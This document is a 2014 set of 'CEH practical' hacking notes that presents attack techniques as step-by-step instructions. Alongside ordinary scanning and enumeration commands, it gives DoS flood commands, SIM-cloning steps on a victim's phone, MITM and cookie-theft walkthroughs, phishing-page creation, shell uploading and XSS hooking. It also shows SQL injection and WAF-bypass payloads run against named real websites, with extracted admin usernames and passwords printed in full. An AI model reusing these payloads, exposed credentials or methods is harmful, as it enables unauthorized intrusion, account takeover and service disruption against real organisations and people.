hacking in shadows by - raghav bisht

1 | P a g e

R o o t - X S e c u r i t y

H a x a - 1 N u l l L a m b d a : X

0 1 1 0 1 0 0 1 0 0 1

0 0 0 1 1 1 0 0 0 1 1

1 2 / 3 1 / 2 0 1 4

Root-X , Shadow Walker &

Raghav

Hacking In Shadow CEH Practical Notes

December 31, 2014

[HACKING IN SHADOW CEH PRACTICAL NOTES]

CONTENT

Foot-printing

Scanning/Banner Grabbing

Enumeration

Google Hacking

Information Gathering [Automated Process ]

Dos Attack D-Dos Attacks

IDS - IPS - Firewall - Antivirus - Honey-pots

Mobile Hacking

Sniffing

Social Engineering

Web-servers & Web-application Hacking

System Hacking

Malwares

Penetration testing

Buffer Overflow

Wi-Fi Hacking

December 31, 2014


FOOTPRINTING 1. Who-is Database domaintools.com

yougetsignal.com

Sam spade [ who is tool ]

net-Tools 5 [ Networking Tools ]

robtex.com

2. Imp Sites archive.org

3. Mirroring Websites httrack

IDM -->Grabber

4. Reverse IP lookup yougetsignal.com

robtex.com

5. ping , netstat, nslookup, tracert CMD Commands ping

ping google.com

ping -t google.com

ping -l 1024 google.com

ping -n 10 google.com

netstat

netstat

netstat -a

netstat -n -o -a

nslookup

nslookup www.site.com

tracert

tracert www.site.com

December 31, 2014


6. Email Harvesting

Tools samspade

black widow

GSA Email Spider

Email Extractor

Metasploit [ Backtrack , Kali Linux ]

msfconsole

search gather [ Search The all Information Gathering Exploits ]

use auxiliary/gather/search_email_collector

set DOMAIN <domain name>

exploit

December 31, 2014


Scanning & Banner Grabbing 1. Network Scanning IP scanning

port scanning

Eg. first IP scanning so for IP scanning we use: Check it out :http://120.59.128.29

I. Angry IP Scanner : 0.0.0.0-255.255.255.255 using the concept of = ping sweep , so lets start

Our Target : 120.59.128.1 - 120.59.128.255

On Ports : 80,21,443,110

lets try to open this ip on port 80 - > Its shows me ADSL Modem -> To bypass this

modem we try brute force or dictionary attack.

Eg. Top ten passwords :

admin

user

custom

manager

abc123

abc@123

password

pa55w0rd

Pa55w0Rd

admin@123

123456

passwd

admin123

user123

[email protected]

II. Nmap/Zenmap

III. Port Scanner

IV. Network scan ( NET DISCOVER [ BT-tool ] ) :

netdiscover -i <interface> -r <target>/24 /16 <--- subnet

netdiscover -i etth0 -r 192.168.1.0/24

December 31, 2014


2. vulnerability scanning

I ]Vulnerability Scanner (Acunetix, Netsparke, Nessus, Gfi languard etc) Backtrack Tools

Whatweb [ Find out web application ][ Backtrack Tool ]

Eg: ./whatweb bytec0de.com

zoomscan [ scan Joomla website ] [ /pentest/web/zoomscan ]

Eg: ./zoomscan.pl -u http://liclanka.com/

Nikto :

Eg ./nikto.pl -host liclanka.com

Websecurifi

application/backtrack/exploitation tool/web exploitation tool/websecurifi

Vega

application/backtrack/vulnerability assessment/web application/web vulnerability

scanner/vega

w3af

application/backtrack/vulnerability assessment/web application/web vulnerability

scanner/w3af

webshag

pentest/enumeration/web/webshag [ ./webshag_gui.py ]

December 31, 2014


December 31, 2014


3. Nmap

Types Of Scans :

TYPES || Commands

1. tcp full connect scan ----> nmap -sT <target name>

2. syn half connect scan ----> nmap -sS <target name>

3. Stealth Scan ----> Used for bypassing firewalls

xmas scan ----> nmap -sX <target name>

null scan ----> nmap -sN <target name>

Fin scan ----> nmap -sF <target name>

4. list scan ----> nmap -sL <list.txt>

5. udp scan ----> nmap -sU <target name>

6. ping scan ----> nmap -sP or -nP or -sn <target name>

7. ack scan ----> nmap -sA <target name>

8. window scan ----> nmap -sW <target name>

10. version scan ----> nmap -sV or -v <target name>11. timming -

11 . Timings T1,T2,T3 -----> Deep Scanning

T4,T5 -------> aggressive timing scanning.

12. quick scan -----> nmap -F <target name>

13. Intense Scan -----> nmap -T4 -A -v <target name>

14. Intense Scan + UDP ----> nmap -sS -sU -T4 -A -v <target name>

15. Intense Scan All TCP ----> nmap -p 1-65535 -T4 -A -v <target name>

16. Intense Scan no ping ----> nmap -T4 -A -v -Pn <target name>

17. Quick Scan Plus ----> nmap -sV -T4 -O -F --version-light <target

name>

18. Quick Traceroute ----> nmap -sn --traceroute < target name >

19. Slow Comprehensive scan ----> nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -

PA3389 -PU40125 -PY -g 53 --script

"default or (discovery and safe)" <target>

December 31, 2014


December 31, 2014


Enumeration I. Enumerate users [ To Take Out Details About User Like ( NetBIOS Name,

Users name etc) ] DNS Enumeration

robtex.com

1. dnsenum (BT)

cd /pentest/enumeration/dns/dnsenum

./dnsenum.pl <target>

./dnsenum bytecode.in

2. dnsmap (BT)

cd /pentest/enumeration/dns/dnsmap

./dnsmap bytecode.in

3. dnsrecon (BT)

cd /pentest/enumeration/dns/dnsrecon

./dnsrecon.py -d bytecode.in

4. dnswalk (BT)

cd /pentest/enumeration/dns/dnswalk

./dnswalk bytecode.in. <--- put dot at last

5. dnstracer (BT)

dnstracer -v bytecode.com

6. dig (BT)

dig

dig A <target> -> for A record IPV4

dig AAA <target> -> for A record IPV6

dig MX <target> -> for MX mail exchange record

dig NS <target>

dig SOA <target>

dig SRV <target>

7. fierce.pl (BT)

fierce.pl -dns bytecode.in

8. nslookup (BT)

BT ~ # nslookup

December 31, 2014


www.checkpoint.com

set type=mx [ MX Records ]

checkpoint.com

set type=ns [ NS Records ]

checkpoint.com

9. Automating lookups

Forward lookup brute force

Reverse lookup brute force

Zone transfers

Web Crawling -> [ admin page finding ]

IDM

HTTRACK

Any Vulnerability Software

December 31, 2014


Nmap

Shared folders [ my lan viewer ]

NetBIOS Service

1. Scanning for the NetBIOS Service SMB4K (BT) [GUI]

smbserverscan (BT) [GUI]

2. Enumerating Usernames samrdump (BT)

BT smb-enum # ./samrdump.py 192.168.90.18

December 31, 2014


Google Hacking 1. http://www.googleguide.com/advanced_operators_reference.html

2. Basic Search

3. Advance Search

4. Directory Listing

intitle:index of parent directory

5. Locating CGI-BIN [ Common Gateway Interface ]

inurl /cgi-bin/login.cgi

6. Traffic Camera Hacking

inurl:indexFrame Camera

allinurl:"view/index" filetype:shtml

== Axis ==

inurl:"view/indexFrame.shtml"

inurl:"view/index.shtml"

intitle:"Live View / - AXIS"

intitle:axis camera

intitle:"axis #Kameramodell#"

== Canon ==

inurl:sample/LvAppl/

== JVC ==

intitle:"V.Networks [Motion Picture(Java)"

== EvoCam ==

intitle:"EvoCam" inurl:"webcam.html"

== WebcamXP ==

intitle:"my webcamXP server!"

December 31, 2014


== MOBOTIX ==

inurl:/control/userimage.html

== Panasonic ==

inurl:/ViewerFrame?Mode=Motion

== FlexWatch ==

inurl:toolam.html

inurl:viewash.html

== Toshiba ==

intitle:"TOSHIBA Network Camera - User Login"

== Sony ==

inurl:/home/homeJ.html

inurl:/view.shtml

intitle:”Live View / - AXIS” | inurl:view/view.shtml^

inurl:ViewerFrame?Mode=

inurl:ViewerFrame?Mode=Refresh

inurl:axis-cgi/jpg

inurl:axis-cgi/mjpg (motion-JPEG)

inurl:view/indexFrame.shtml

inurl:view/index.shtml

inurl:view/view.shtml

liveapplet

intitle:”live view” intitle:axis

intitle:liveapplet

allintitle:”Network Camera NetworkCamera”

intitle:axis intitle:”video server”

intitle:liveapplet inurl:LvAppl

intitle:”EvoCam” inurl:”webcam.html”

intitle:”Live NetSnap Cam-Server feed”

intitle:”Live View / - AXIS”

intitle:”Live View / - AXIS 206M”

December 31, 2014


intitle:”Live View / - AXIS 206W”

intitle:”Toshiba Network Camera” user login

intitle:”netcam live image”

intitle:”i-Catcher Console - Web Monitor”

intitle:start inurl:cgistart

intitle:”WJ-NT104 Main Page”

intext:”MOBOTIX M1? intext:”Open Menu”

intext:”MOBOTIX M10? intext:”Open Menu”

intext:”MOBOTIX D10? intext:”Open Menu”

intitle:snc-z20 inurl:home/

intitle:snc-cs3 inurl:home/

intitle:snc-rz30 inurl:home/

intitle:”sony network camera snc-p1?

intitle:”sony network camera snc-m1?

site:.viewnetcam.com -www.viewnetcam.com

December 31, 2014


December 31, 2014


Information Gathering [Automated Process ] 1] Information Gathering : > Uberharvest

> theharvester.py

> metaGooFii

> Web Data Extractors ( Email-Phone no Extractors )

> Maltego

2] People Search : > pipl.com

> anywho.com

> address.com

> Social networking sites [ facebook,linedin,twitter ]

> Job Sites [ dice.com, monster.com,naukri.com ]

3] Phone Number > truecaller.com

> kgdetective.com

> phunwa.com

4] Trace route Tools > Trout [ www.foundstone.com ]

> tracert , traceroute [ commands ]

5] Email IP Tracking > http://blasze.tk

> wspy.org

> Emailtrackerpro.com

> Readnotify.com

> Politemail.com

> www.whatismyip.com

> http://www.iptrackeronline.com

December 31, 2014


Dos Attack D-Dos Attacks

December 31, 2014


December 31, 2014


1. DOS ATTACK It is an attempt to make a machine or network resource unavailable to its intended

users.

Consuming all resources given to person. Like Network bandwidth , All Type Of

Memory etc...

Ping Of Death

ping -t -l 6550 google.com [ max buffer size = 65500 ]

ping bytecode.in -l 1460 -n 10000000 -w 1

Effective system [ Solaris 2.4 , ninix , win3.11,95 ]

SYN-ATTACK

hping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 --flood [-S -> SYN, open ssh

port, syn flood on router, -a <Source address>, -S<Victim addtress>]

UDP/HTTP/TCP Flooding

LOIC

HOIC

Smurf Attack

make your own packet and flood on network

pktbuilder

packETH 1.6 [ linux & windows ]

CDP Flooding [ Cisco Discovery Protocol ]

yersinia [ backtrack ]

Done on Cisco Switches & Routers

MAC Flooding [ BT ]

Flooding network switches

ARP Spoofing

Net cut [ Windows ]

ettercap [ Backtrack ]

Deauthentication Technique

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30

ath0

Where:

December 31, 2014


-0 : means Deauthentication

1 : is the number of deauths to send (you can send multiple if

you wish); 0 means send them continuously

-a : MAC address of the access point ( Router )

-c : MAC address of the client to Deauthentication; if this is

omitted then all clients are deauthenticated

ath0 : is the interface name

2. D-Dos ATTACK HTTP ATTACK

Get-Post Methods

DNS Amplification Attack

NTP Amplification Attack

Slowloris Attack [ Used when , Firewall blocks your Ip address after some

requests ] [slowloris.pl ] slowloris.pl -dns www.site.com -timeout 1 -cache

3. IPV6 Flooding : [ RA Flood Attack]

Victim : windows user

Advertising the IPV6 Network [ ./fake_router6 eth1 def:c0::/64 ]

cd /pentest/spoofing/thc-ipv6

Now flooding. [ ./flood_router6 eth1 ]

4. Scapy [ Packet manipulation tool ] Features -> capture, create, play,

reply, scan, discover.]

I. scapy -> Sending packet from scapy send(IP(src="192.168.1.55",dst="192.168.1.1")/ICMP()/"OurPayload") -> check with

wireshark.

ctrd+d

II. scapy -> Creating Our Packet & Sending Packet L2=Ether()

December 31, 2014


L3=IP()

L4=TCP()

L2.show()

L2=Ether(src="01:23:45:67:89:ab")

L3=IP(ttl=99, dst="192.168.1.1")

del(L3.dst)

L3.dst="192.168.1.2"

L4=TCP(sport=6783, dport=22, flag="A")

L4.show()

send=sendp(L2/L3/L4) -> To send Packet

III. scapy -> Sniffing with scapy sniff(iface="eth0", prn=lambda x:x.show()) -> show full packet detail

ctrl+c

sniff(iface="eth0", prn=lambda x:x.summary()) -> do not show full packet detail

sniff(filter="host 192.168.1.1", count=5)

a=_

a.nsummary()

a[1]

5. Hping3 [ port scanning, syn, ack, ip, others host discovery, sniffer,

flooding, file transfer ] hping3-h "or" man hping3 [Help menu]

hping3 -S www.lpu.in -p 80 -c 2 [ -S -> SYN Request, -c -> how many time to ping ]

hping3 -S 192.168.1.38 -p ++50 -c 5 [++50 port start with 50,51,52,53]

hping3 -1 192.168.1.x --rand-dest -I eth0 [-1-> ICMP , Ping all possible ip address in

random order ]

hping3 -1 192.168.1.1 --icmp-ts -c 2 [Check time stamp ]

hping3 -8 50-56 -S 8.8.8.8 [-8 -> Scaning, 50-56 -> Port, 8.8.8.8 -> google dns server]

hping -2 192.168.1.6 -p 80 -c 1 [-2 -> udp]

hping3 -F -P -U 192.168.1.38 -c 3 [-F -> FIN, -P -> PUSH, -U -> URGENT] [X-Mas

Scan]

hping3 192.168.1.38 -Q -P 139 - s [-Q -> Sequence number]

hping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 --flood [-S -> SYN, open ssh port, syn

flood on router, -a <Source address>, -S<Victim addtress>]

hping3 –rand-source targetIPadress –flood -S -L 0 -p 80

hping3 -2 www.lpu.in -p ++44444 -T -n [Trace Route using UDP] [ctrl+z -> If doesn't

respond ]

hping3 -S www.lpu.in -p 53 -T [Trace Route using TCP]

December 31, 2014


NOTE : hping3 also work as hping interpreter & scapy.

hping3

hping send

"ip(saddr=192.168.1.55,daddr=192.168.1.38,ttl=15)+tcp(sport=6783,dport=80,flags=s)"

6. CDP - Flooding [ Cisco Discovery Protocol ] [CPU Damaging

Routers & Switches] yersinia -G

Launch attack

CDP

flood CDP table

ok

List attacks

cancel all attacks

7. HTTP Flood Attack ApacheBench [Tool BT]

ab -c 1000 -n 10000 http://youripaddress/

8. UDP Flood Attack hping3 -flood-rand-source -udp -p 53 YourtargetIPaddress

*9. SYN FloodAttack hping3 -rand-source targetIPadress -flood -S -L 0 -p 80

December 31, 2014


NOTE : Slowlowris.pl

December 31, 2014


IDS - IPS - Firewall - Antivirus - Honeypots 1. Firewall I. Windows Firewall [ netsh ] netsh /?

netsh lan /?

help

firewall

help

netsh firewall set portopening tcp 445 smb enable --> To open port in my system

TCP/IP troubleshooting and interface resets : Install the TCP/IP protocol- netsh int ipv4 install

Uninstall the TCP/IP protocol- netsh int ipv4 uninstall

Configure the Windows Advanced Firewall :

Show all firewall rules

netsh advfirewall firewall show rule name=all

Delete an inbound advanced firewall rule for port 21

netsh advfirewall firewall delete name rule name=all protocol=tcp

localport=21

Export Windows Advanced Firewall settings - netsh advfirewall export “c:\advfirewall.wfw”

Perhaps the most common command you might use is the command to enable or

disable your Windows firewall, like this: netsh firewall set opmode disable

netsh firewall set opmode enable

1. To deny all incoming connections and allow all outgoing connections :

netsh advfirewall set all profiles firewall policy block inbound, allow

outbound

2. To enable firewall: netsh advfirewall set all profiles state on

netsh firewall set opmode enable

December 31, 2014


3. To disable firewall: netsh advfirewall set all profiles state off

netsh firewall set opmode disable

4. Allow or Deny rules

To add a rule allowing tcp or udp incoming packets on port 80: netsh advfirewall firewall add rule name="HTTP"

protocol=TCP localport=80 action=allow dir=IN

netsh advfirewall firewall add rule name="HTTP"

protocol=UDP localport=80 action=allow dir=IN

To deny tcp or udp packets on port x: netsh advfirewall firewall add rule name="HTTP"

protocol=TCP localport=80 action=block dir=IN


protocol=UDP localport=80 action=block dir=IN

5. Delete a rule

To delete a rule issue the following command: netsh advfirewall firewall delete rule name="HTTP"

6. Allow or deny

incoming connection for specific port and IP

To allow from specific ip: netsh advfirewall firewall add rule name="HTTP"

protocol=TCP localport=80 action=allow dir=IN remoteip=x.x.x.x

To deny from specific ip: netsh advfirewall firewall add rule name="HTTP"

protocol=TCP localport=80 action=block dir=IN remoteip=x.x.x.x

Allow or deny a subnet netsh advfirewall firewall add rule name="HTTP"

protocol=TCP localport=80 action=block dir=IN remoteip=x.x.x.x/24

December 31, 2014


or


protocol=TCP localport=80 action=allow dir=IN remoteip=x.x.x.x-x.x.x.x

or


protocol=TCP localport=80 action=block dir=IN remoteip=localsubnet

2. Linux Firewall [ Iptables ]

IP Address Blocking

iptables -A INPUT -s <Ip Address> -j DROP

iptables -A INPUT -s <Ip Address> -p tcp --destination-port 80 -j DROP

iptables -A INPUT -s <Ip Address> -p tcp --destination-port 443 -j DROP

sudo ufw deny from $ip

IP Address Allowing

iptables -D INPUT -s <Ip Address> -j DROP

sudo ufw allow from <Ip Address>

2. Honeypot Net Tools

Hack Trapper

December 31, 2014


Honeybot

Port Scan Attack Detector

December 31, 2014


December 31, 2014


Mobile Hacking 1. SIM Cloning

SIM - Subscriber identity module

IMSI - International mobile subscriber identity

IMEI - International Mobile Station Equipment Identity

Esn - Electronic serial number

MIN - Mobile identification number

CDMA Sim Cloning :

1. check for usb drivers

2. attach usb

3. check for port "right click on my computer > manage > device manager > ports"

4. open cdma workshop 2.7.0 set the port > press read.[ All detail of phone will be saved

]

5. give back the victim phone to him.

7. attach reliance netconnect (http://kollam.olx.in/reliance-netconnect-zte-880-cdma-1x-

iid-449181852)

> http://www.priceindia.org/broadband/reliance/zte-mg-880-data-card-price/

8. again see port.

9. open CDMA workshop v2.7.0 --> set port

10. write all sim details on zte-mg-880-data-card

December 31, 2014


2. Android Rooting

December 31, 2014


Useful Apps : FX File Explorer Plus v2.3.1.7 ROOT + All Add-Ons

Root Explorer v3.1.7 for Android 2.3 & 3.0+

SD Maid Pro v3.0.2.8 ROOT + Unlocker

SuperSU v1.93 + SuperSU Pro Key

Lucky Patcher v4.3.1.apk

SRSRoot v4.7 Android SRS RootSuperSU v1.93

Root.Explorer.v2.7

SuperSU Pro Key v1.00 ROOT FULL Android

How to root your... HTC One (M8)

Unlock your bootloader via HTCdev.com

Download and install TWRP for the M8 from

http://teamw.in/project/twrp2/225

Flash the SuperSU root zip from http://forum.xda-

developers.com/showthread.php?t=1538053

Samsung Galaxy S5 Download the Odin fl ash utility from http://forum.xda-


Download the CF-Auto-Root package from http://forum.xda-


Extract the TAR fi le from the CF-Auto-Root zip Select the TAR fi le as

type PDA in Odin, and fl ash with your device in download mode (power

on with home and volume down held)

Sony Xperia Z2 Unlock the bootloader of your device: http://forum.xda-developers.com/

showthread.php?t=2440597

Download ClockworkMod Recovery from http://forum.xda-developers.

com/showthreadphp?t=2702001 and flash using fastboot

Reboot to recovery and fl ash the SuperSU root zip from

http://forum.xda-developers.com/showthreadphp?t=1538053

December 31, 2014


3. Jail breaking IOS APPLE

Jailbreak 7, 7.0.3, 7.0.4 untethered for iPhone 5s, 5c, 5, iPad and iPod touch

(Guide)

STEP 1: Download Evasi0n7 for Mac OS X/Windows. *new version here*

STEP 2: Download your iOS 7.x.x from our download page.

STEP 3: Make sure to backup all your data on your iPhone using iTunes or iCloud before using

Evasi0n7 untethered jailbreak.

STEP 4: Launch Evasi0n7 and plug in your device to the computer then click on "Jailbreak"

button.

STEP 5: Now Evasi0n7 will start the jailbreak process, so sit back and enjoy.

STEP 6: Evasi0n7 will reboot your device.

STEP 7: After done, an app of Evasi0n7 will appear on your iPhone's homescreen. Tap on it.

STEP 8: Your device will be rebooted again.

STEP 9: Evasi0n7 will continue processing your jailbreak and will reboot your iPhone for

several times until the jailbreak is done.

STEP 8: And you are ready to go.

SOURCE : http://www.redsn0w.us/2013/12/jailbreak-7-703-704-untethered-for.html

Supported Devices : For both Mac OS X and Windows, you can now jailbreak your iOS 7.x device with one-click

Evasi0n7 jailbreak tool.

Jailbreak devices:

iPhone 5s

iPhone 5c

iPhone 5

iPhone 4S

iPhone 4

iPad 2

iPad 3

iPad 4

iPad Air

iPad mini

iPad mini 2

iPod touch 5

December 31, 2014


4. Smartphone Pentest Framework Master Link : https://github.com/georgiaw/Smartphone-Pentest-Framework

December 31, 2014


Sniffing 1. Man In The Middle Attack Using Ettercap. Tools : 1] whireshark

2] ettercap

3] cain & able

1] Ettercap:

> vi /etc/etter.conf

> Put : eu_uid = 0

> Put : eu_gid = 0

> Come to linux and enable the iptables rule . ( Remove # )

> ettercap -G [ To open ettercap in graphical mode ]

> sniff / unified sniff / choose interface

> Hosts / scann for host / Host list

> add router ip to target 1 & rest r victims to target 2

> MITM / arp pois

> Start Sniff

2] Wireshark:

> open wireshark

> start sniff

> Filters protocols [ http,ftp,smtp etc ] => http://wiki.wireshark.org/DisplayFilters

> http.request.method == "POST"

> tcp.port eq 25 or icmp

> ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16

> tcp.window_size == 0 && tcp.flags.reset != 1

> smb || nbns || dcerpc || nbss || dns

> ip.addr == 10.43.54.65

> ip.addr != 10.43.54.65

NOTE : Analyzing Traffic Using Wireshark

December 31, 2014


Step1 : Open Wireshark

Step2 : Choose Interface and Start Sniffing

December 31, 2014


Step3 : Filtering Protocols

Step4 : Follow the tcp stream

December 31, 2014


Step5: Check the Header

December 31, 2014


3. Man In The Middle Attack Using xplico :

Tools Need 1. Ettercap

2. Xplico

Victim Info :

Victim -> 192.168.1.21

arp -a -> aa-aa-aa-aa-aa-aa

gateway > 192.168.1.1

apt-get update

apt-get upgrade

1. ettercap -G

> sniff

> unified sniffing

> select interface

> host

> scan for host

> Host list

> default gateway add to target 1

> .21 <victim> add to target 2

> Mitm

> arp poisoning

> ok

2. In terminal -> IP Forwarding # echo 1 > /proc/sys/net/ipv4/ip_forward

3. Backtrack > Forensics > Network Forensics > xplico web gui

> http://localhost:9876/

> u : xplico P: xplico

> case

> Live acquistion

> case name : Anything > Create

> Click on your case Eg. anything

> New Session

> Session Name : xyz

> click on session xyz

> At Live :

> Interface

December 31, 2014


> lo, et0, wlan0 ...Etc

NOTE : If victim is doing net all its session will be saved by xplico.

4. driftnet –I eth0

5. Session Hijacking Tokens = 128-256 bit AES cipher

1. Cookies > wireshark filter : http.cookie contains "datr"

> http.cookie && ip.src==<Target ip> -----> Check For : 1012 GET / HTTP/1.1

2. <SCRIPT>alert(document.cookie);</SCRIPT> [XSS - Vulnerability]

3. Fiddler

Step 1 : Open Fiddler

December 31, 2014


Step 2 : Tick the https Decryption Check Box

Step 3 : Take Your Victim Traffic

December 31, 2014


Step 4 : Take Out Your Victim Cookies

Step 5 : Attacker replace them with help Cookies Editor on firefox.

December 31, 2014


Social Engineering 1. Human Based

2. Computer Based

1. Human Based : > There is no patch to human stupidity.

> Social Eng is the human side of breaking into a corporate network.

1. Posing as legitimate end user. > Give identity and asks for the sensitive information.

2. Posing as Important user. > as VIP, CFO, CEO etc

3. Posing as Technical Support. > calls as technical support staff and request id & password

4. Eavesdropping > or unauthorized listening of conversation or reading of

messages.

5. Sholder Surfing > Looking over your sholder as you enter a password

6. Dumpster Diving

> Search for sensitive information at target company's. > Trash-bins

> printer trash bins

> sticky notes

> phone bills

> contact information

> financial information

7. Tailgating > An unauthorized person, wearing a fake ID badge enter

secured area by closely following an authorized person through a door

requiring key access.

8. Piggybacking > I forgot my ID badge at home. Please help me.

December 31, 2014


2. Computer Based Social Engineering : > Mail / attachments > Trojens

> Keyloggers

> Pop-up Windows

> Phishing > Hoaxes and chain letters

> Websites / Sweepstakes

> Spam mails

Eg. Phishing

Step1 : Creating Fake Facebook page.

Step2 : Save This page Source Code In Notepad

December 31, 2014


Step 3 : Find " login.php?login_attempt=1 "

December 31, 2014


December 31, 2014


2. Tabnapping

December 31, 2014


December 31, 2014


Web-servers & Web-application

Hacking 1] SQL Injection

2] Exploiting Hidden Elements [Tool : web developer addon] > To manuplating html elements, tags,Forms etc on website.

> Eg: woodlandworldwide.com [vanulable site]

3] PHP Discloser > look for vanurable site like

[http://hrithikrules.com/displayArt.php?fname=filmography/krrish2/permission.txt&dirname=ma

in]

> now [ http://hrithikrules.com/displayArt.php?fname=index.php]

4] XSS [Cross Site Scripting] [put JS query to search box, URLS etc] > http://www.hrithikrules.com/ [Put the JS to his search box it will redirectu]

> <script>alert("hacked")</script>

--------> Beef [Tool] [Backtrack] [start server and attach your link to your xss iframe scrpt and

sentd it to other user in lan]

--------> Download beef -> upload it to free hosting site -> get your link ->attach to xxs ---> send

any where in world.

> <script iframe src=http://www.world4free.in></script>

4.1] XSS Shell

5] Lfi / Rfi [File inclusion] [Tool : wAppex] >http://www.hrithikrules.com/displayArt.php?fname=filmography/mohenjodaro/research

.txt&dirname=main

>http://www.hrithikrules.com/displayArt.php?fname=../../../../../../../../../../../../../../etc/pass

wd

6] DNN Portal Hacking

7] Shell Uploading > Do sql injection first find admin password for server.

December 31, 2014


> now open his website find any page whick upload some things [ multimedia uploading

]

> upload your shell [ .php,.aspx,.asp,.jsp ]

NOTE : some time directly shell are not uploade so rename there extention to any other filetype

and run " Tamper Data Firefox addon "

while uploading shell. remove your extantion while uploading.

> eg : http://www.arenamultimedia.in/news.aspx?id=news

===========================================================

1. Sql Injection : www.mags.edu.in/aboutus.php?id=2

www.mags.edu.in/aboutus.php?id=2' |<--Error

www.mags.edu.in/aboutus.php?id=2 order by 1 |<--No Error

www.mags.edu.in/aboutus.php?id=2 order by 100 |<--Error

www.mags.edu.in/aboutus.php?id=2 order by 10 |<--Error

www.mags.edu.in/aboutus.php?id=2 order by 2 |<--Error + page content

SO, Directly find the vulnerable column...

www.mags.edu.in/aboutus.php?id=2 union select 1 |<--Show Nothing

www.mags.edu.in/aboutus.php?id=-2 union select 1 |<--Vulnerable column is = 1

www.mags.edu.in/aboutus.php?id=-2 union select 1,2 |<--Error

Now,

1. Find Version Of Database. > www.mags.edu.in/aboutus.php?id=-2 union select @@version | 5.0.96-log

2. Find Database Name > www.mags.edu.in/aboutus.php?id=-2 union select database() | magschool

3. To Find Numbers Of Tables In Database

www.mags.edu.in/aboutus.php?id=-2 union select group_concat(table_name) from

information_schema.tables where table_schema=database()

amaps_admin, -----> 0x616d6170735f61646d696e campusphotos, categories, celebration, contentmanagement, courses, domains, engineering,

events

December 31, 2014


,facilities,faculty,medmain,news,pending,query_log,register_form,site_category,sit

es,temp

4. To Find Number of Columns In Table

www.mags.edu.in/aboutus.php?id=-2 union select group_concat(column_name) from

information_schema.columns where table_name=0x616d6170735f61646d696e

adminid ,username ,password

5. To Find Username & Password :

www.mags.edu.in/aboutus.php?id=-2 union select

group_concat(adminid,0x3a,username,0x3a,password) from amaps_admin

adminid = 1

username = adminmags

password = magsmet#749$

______________________________________________________________________________

2. SQL Injection WAF Bypass

http://www.geca.ac.in/departments/hod.php?id=14

http://www.geca.ac.in/departments/hod.php?id=14'

http://www.geca.ac.in/departments/hod.php?id=14 order by 1









-----------------------------------------------------------

www.geca.ac.in/departments/hod.php?id=14 union select 1,2,3,4,5,6,7,8,9

December 31, 2014


Not Acceptable! | An appropriate representation of the requested resource could not be found on

this server. This error was generated by Mod_Security.

So,

www.geca.ac.in/departments/hod.php?id=14 /**//*!12345union select*//**/1,2,3,4,5,6,7,8,9

www.geca.ac.in/departments/hod.php?id=-14 /**//*!12345union select*//**/1,2,3,4,5,6,7,8,9

Vulnerable Columns = 6,3,5

=====================================================================

www.geca.ac.in/departments/hod.php?id=-14 /**//*!12345union

select*//**/1,2,3,4,@@version,6,7,8,9

Version = 5.1.57-rel12.8-log

=====================================================================

Finding Tables :

http://www.geca.ac.in/departments/hod.php?id=-

14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tabl

es*/+where+/*!table_schema*/+like+database()

about_aurangabad

admin_login

album

assignment

login

---------------------------------------------------------------------------------------------------

Finding Tables Using Limit :


14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tabl

es*/+where+/*!table_schema*/+like+database()+limit+1,1

Limit increment like -> 1,1

1,2

December 31, 2014


1,3

1,4

etc

admin_login --------------> 0x61646d696e5f6c6f67696e

=====================================================================


14+/**//*!12345union+select*//**/1,2,3,4,column_name,6,7,8,9+from+/*!information_schema.c

olumns*/+where+/*!table_name*/+like+0x61646d696e5f6c6f67696e

admin_id

user_name

pass_word

fname

lname

email

backpage

----------------------------------------------------------------------------------------------------

Using Limit :


14+/**//*!12345union+select*//**/1,2,3,4,column_name,6,7,8,9+from+/*!information_schema.c

olumns*/+where+/*!table_name*/+like+0x61646d696e5f6c6f67696e+limit+1,1

Limit increment like -> 1,1

1,2

1,3

1,4

etc

user_name

=====================================================================


14+/**//*!12345union+select*//**/1,2,3,4,admin_id,6,7,8,9+from+admin_login

December 31, 2014


admin_id = 1

---------------------------------------------------------------------------------------------------------------------


14+/**//*!12345union+select*//**/1,2,3,4,user_name,6,7,8,9+from+admin_login

user_name = admin@325

---------------------------------------------------------------------------------------------------------------------


14+/**//*!12345union+select*//**/1,2,3,4,pass_word,6,7,8,9+from+admin_login

pass_word = z9xexTqZk%+-328123z9xexTqZk%+-328123

---------------------------------------------------------------------------------------------------------------------


14+/**//*!12345union+select*//**/1,2,3,4,fname,6,7,8,9+from+admin_login

fname = shriram

---------------------------------------------------------------------------------------------------------------------


14+/**//*!12345union+select*//**/1,2,3,4,lname,6,7,8,9+from+admin_login

lname = chaudhari

---------------------------------------------------------------------------------------------------------------------


14+/**//*!12345union+select*//**/1,2,3,4,email,6,7,8,9+from+admin_login

email = [email protected]

---------------------------------------------------------------------------------------------------------------------


14+/**//*!12345union+select*//**/1,2,3,4,backpage,6,7,8,9+from+admin_login

backpage =index.php

---------------------------------------------------------------------------------------------------------------------

3. Xpath Injection http://zerofreak.blogspot.in/2012/02/tutorial-by-zer0freak-zer0freak-sqli.html

Step 1: Inject --> +and extractvalue(rand(),concat(0x0a,version()))--

December 31, 2014


Eg:

http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,vers

ion()))--

msg: Could not query:XPATH syntax error: ' 5.5.32-cll'

=====================================================================

Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select

concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database()

limit 0,1)))--+

Eg: www.viratcooker.com/recipe.php?ID=3+and

extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from

/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+

msg: Could not query:XPATH syntax error: ' :RecipeIngredients'

-----------------------------------------------------------------------

Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...


extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from

/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+

msg: Could not query:XPATH syntax error: ' :SS_categories'

------------------------------------------------------------------------

Respectively :~ For 2,3,4,5,6,7,8.....

